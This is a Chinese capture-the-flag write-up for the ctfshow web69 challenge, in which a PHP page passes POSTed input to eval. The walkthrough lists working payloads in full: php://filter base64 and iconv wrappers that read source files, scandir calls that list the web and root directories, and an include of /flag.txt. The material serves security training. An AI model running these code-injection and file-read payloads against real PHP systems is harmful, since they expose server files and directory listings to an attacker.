[ctfshow web入门] web69

信息收集

使用c=include("php://filter/convert.base64-encode/resource=index.php");读取的index.php

php 复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

解题

查目录

百度了一下有哪些打印函数,var_export能用

  • var_export() 函数输出或返回有关变量的结构化信息。
    该函数的工作方式与 var_dump() 类似,不同之处在于该函数的返回值是有效的 PHP 代码。
php 复制代码
c=var_export(scandir('.'));

或者换一个思路,用一个函数把array 转成字符串 ,因为我发现printecho没被禁用

php 复制代码
c=echo(implode(', ', scandir('.')));
c=print(join(', ', scandir('.')));

implode(separator,array):implode函数返回一个由数组元素组合成的字符串。

join(separator,array):join函数是implode函数的别名。


读文件

flag不在flag.php,和之前一样,不是本篇重点,不再截图

php 复制代码
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");
c=include("php://filter/convert.base64-encode/resource=flag.php");
php 复制代码
c=var_export(scandir('/'));
c=echo(implode(', ', scandir('/')));
c=print(join(', ', scandir('/')));
php 复制代码
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");
c=include("php://filter/convert.base64-encode/resource=/flag.txt");
c=include("/flag.txt");

web68    目录    web70

相关推荐
爱分享的程序员10 分钟前
前端面试专栏-算法篇:18. 查找算法(二分查找、哈希查找)
前端·javascript·node.js
翻滚吧键盘15 分钟前
vue 条件渲染(v-if v-else-if v-else v-show)
前端·javascript·vue.js
vim怎么退出17 分钟前
万字长文带你了解微前端架构
前端·微服务·前端框架
你这个年龄怎么睡得着的17 分钟前
为什么 JavaScript 中 'str' 不是对象,却能调用方法?
前端·javascript·面试
Java水解20 分钟前
前端常用单位em/px/rem/vh/vm到底有什么区别?
前端
CAD老兵23 分钟前
Vite 如何借助 esbuild 实现极速 Dev Server 体验,并支持无 source map 的源码调试
前端
南屿im24 分钟前
JavaScript 手写实现防抖与节流:优化高频事件处理的利器
前端·javascript
Spider_Man24 分钟前
从零开始构建React天气应用:API集成与UI设计全指南 🌤️
前端·react.js
浩浩测试一下39 分钟前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
西陵1 小时前
Nx带来极致的前端开发体验——借助CDD&TDD开发提效
前端·javascript·架构